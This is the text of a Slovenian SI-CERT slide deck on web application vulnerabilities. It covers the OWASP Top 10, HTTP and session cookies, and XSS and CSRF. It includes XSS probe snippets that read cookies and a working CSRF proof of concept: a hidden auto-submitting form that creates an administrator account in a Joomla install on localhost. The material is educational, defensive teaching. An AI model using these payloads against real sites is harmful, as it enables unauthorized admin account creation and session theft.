Ranljivosti spletnih aplikacij Tadej Hren, SI-CERT(ARNES)
Ranljivosti spletnih
aplikacij
Tadej Hren, SI-CERT(ARNES)
SPLETNA APLIKACIJA
RANLJIVA APLIKACIJA
Top 10
• Cross Site Scripting (XSS)
• Injection Flaws
• Malicious File Execution (RFI)
• Insecure Direct Object Reference
• Cross Site Request Forgery (CSRF)
• Information Leakage and Improper Error Handling
• Broken Authentication and Session Management
• Insecure Cryptographic Storage
• Insecure Communications
• Failure to Restrict URL Access
• ...
Kako deluje splet?
google.com
GET /index.html
HTTP/1.x 200 OK
<html><head><title>Google</title>...
<img src="/images/logo.png"/><input
type=submit value= "Iskanje
Google">...</html>
GET /images/logo.png
HTTP/1.x 200 OK
...........X.v.6...S.Z.j..O..Q.7q..6'M6...f.9
... .....s..z.O.....E.Iv....x...&..
`.....Mr=..INq2....(.....[F.......uI=
T."O.....!"9...........D3..........&J.._,
Bi kdo piškotek?
gmail.com
POST /accounts/Login?service=mail
Email=tadej.hren&Passwd=blabla
HTTP/1.x 200 OK
Set-Cookie: SID=DQA4V8lfg4dtusv
<html><head>...
GET /mail/sendmail?service=mail
Cookie: SID=DQA4V8lfg4dtusv
HTTP/1.x 200 OK
<html><head>...
user:tadej.hren
Cookie:DQA4V8…
…
Javascript
<script>document.cookie</script>
Javascript
<script>alert("Pomembno obvestilo!")</script>
Cross Site Scripting (XSS)
Izkorišča zaupanje uporabnika,
ki ga ima do spletne strani
XSS
DEMO
Cross Site Request Forgery
(CSRF)
Izkorišča zaupanje spletne strani,
ki ga ima do uporabnika
CSRF
SPLETNA STRAN BRSKALNIK UPORABNIK
Avtenticirana seja
X
DEJANJE
CSRF
DEMO
Slikca? <html><body>
<script type="text/javascript">
window.onload = function() {<html><body><script type="text/javascript">
window.onload = function() {
var url = "http://localhost/slojoomla/administrator/index2.php";
var gid = 25;
var user = 'ub3rh4cker';
var pass = 'password';
var email = '[email protected]';
var param = {
name: user, username: user, email: email, password: pass,
password2: pass, gid: gid, block: 0, option: 'com_users',
task: 'save', sendEmail: 1
};
var form = document.createElement('form');
form.action = url; form.method = 'post';
form.target = 'hidden'; form.style.display = 'none';
for (var i in param) {
try {
// ie
var input = document.createElement('<input name="'+i+'">');
} catch(e) {
// other browsers
var input = document.createElement('input');
input.name = i;
}
input.setAttribute('value', param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</script>
<iframe name="hidden" style="display: none"></iframe>
<img src="clip.png"></body></html>
XSS+CSRF
Anica
Bine
Cene
Davor
Erika
Filip
Grega
Haso
Ivan
Ivan
Joži
Karmen
Luka
Mitja
Nina
Oma
Petra
Rado
Suljo
Šime
Tedi
Urbi
Vera
Zarja
Željko
RANLJIVA APLIKACIJA
RANLJIVA APLIKACIJA
Zaščita?
IE8
FF&NoScript
Vprašanja?
• http://www.cert.si
• http://www.arnes.si/si-cert
• http://www.twitter.com/sicert